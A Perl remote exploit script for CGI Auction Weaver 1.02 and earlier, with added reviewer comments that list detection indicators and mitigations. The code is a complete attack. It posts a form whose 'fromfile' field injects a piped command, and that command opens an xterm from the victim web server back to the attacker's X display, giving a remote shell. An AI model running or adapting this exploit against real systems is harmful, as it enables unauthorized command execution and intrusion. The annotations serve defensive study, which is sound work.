#!/usr/bin/perl

# | Remote exploit for CGI Auction Weaver <= 1.02, CSC
# | Copyright (c) 2000 by <teleh0r@digit-labs.org>
# | All rights reserved.
# |
# | http://www.digit-labs.org/ || digit-labs

# Reviewer annotation (defensive reading of this proof-of-concept).
#
# What the script does: it builds a single HTTP POST for
# /cgi-bin/awl/auctionweaver.pl in which the `fromfile` form field is wrapped
# in URL-encoded pipe characters (%7C ... %7C), sends it to TCP port 80 of the
# target, and opens the local X server to the target host with xhost for ten
# seconds. The header above states the affected versions as <= 1.02.
#
# Indicators a defender can take from this file:
#   - POST requests to /cgi-bin/awl/auctionweaver.pl whose body contains
#     `fromfile=%7C` (a pipe in a field that is named like a file path).
#   - The fixed strings below (Referer, username=teleh0r, password=ohbaby,
#     bid=Ihavenomoney) identify this exact script, but they are plain
#     literals and the path plus the piped `fromfile` value is the more
#     durable signal.
#   - The embedded command is `xterm -ut -display <host>:<dpy>`, so a
#     successful run would show up as an outbound X11 connection from the web
#     server (conventionally TCP 6000 + display number).
#
# Mitigation belongs in the CGI: reject pipe and shell metacharacters in
# `fromfile`. Presumably the value reaches a two-argument Perl open() -
# confirm against the auctionweaver.pl source. Blocking X11 egress from web
# servers limits the impact of this specific payload.

# Options -t, -a, -d and -o all take a value; $args{'o'} is never read in this
# file. There is no `use strict` / `use warnings`, so every variable below is
# a package global.
use Getopt::Std; getopts('t:a:d:o:', \%args);
use Socket;

if (defined($args{'t'})) { $target   = $args{'t'}; }
if (defined($args{'a'})) { $attacker = $args{'a'}; }
if (defined($args{'d'})) { $dpy      = $args{'d'}; }


# NOTE(review): defined() is applied to the result of the && chain, not to
# each variable separately.
if (!(defined($target && $attacker && $dpy))) {
    die("Usage: $0 -t \"target\" -a \"attacker\" -d \"dpy\"\n");
}

# NOTE(review): /\d/ is unanchored, so this only requires one digit somewhere
# in $dpy; any other characters are accepted alongside it.
if ($dpy !~ /\d/) { die("dpy must be a number"); }

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

# NOTE(review): single-string system() hands the command to the shell when it
# contains metacharacters, and $target comes straight from -t with no
# validation, so the argument is interpreted by the local shell. The call
# also adds the target host to the local X server's host-based access list;
# if any `|| die` below fires, the matching `xhost -` on the last line never
# runs and that entry stays in place.
system("xhost + $target");
# Declared Content-length: a fixed base of 362 plus the lengths of the two
# arguments. It is not derived from length($cgicode), so it is only as
# accurate as that constant.
$length = 362 + length($attacker.$dpy);

# URL-encoded form body. %7C is '|' and %3A is ':'; the `fromfile` value is
# therefore `|xterm -ut -display $attacker:$dpy|`. $attacker and $dpy are
# interpolated without any URL-encoding of their own.
$cgicode =
"flag1=1&fromfile=%7Cxterm+-ut+-display+$attacker%3A$dpy".
"%7C&placebid=1&catdir=cat1&username=teleh0r&password=oh".
"baby&bid=Ihavenomoney&nobidite=1&sbutton=BID";

# Full request as one multi-line string literal. The header lines end with
# whatever newline this file uses rather than an explicit \015\012 (only the
# send() call below appends a CRLF) - presumably bare LF on the wire, which
# is itself a recognisable trait in raw request captures.
$sploit=
"POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
Host: $target
Referer: http://teleh0r.cjb.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate, compress, identity
Content-Type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

# Resolve the target and prepare a TCP endpoint; the port is fixed at 80.
$iaddr = inet_aton($target)                   || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)              || die("Error: $!\n");
$proto = getprotobyname('tcp')                || die("Error: $!\n");

# Bareword handle SOCKET. The request is written once and the socket is
# closed immediately; the HTTP response is never read, so the script itself
# has no way to tell whether the server processed the request.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto)  || die("Error: $!\n");
connect(SOCKET, $paddr)                       || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)             || die("Error: $!\n");
close(SOCKET);

# Wait ten seconds, then remove the target from the local X access list.
# Per the xhost manual, removing a host denies new connections but does not
# break ones already established.
sleep(10);system("xhost - $target");exit(0);
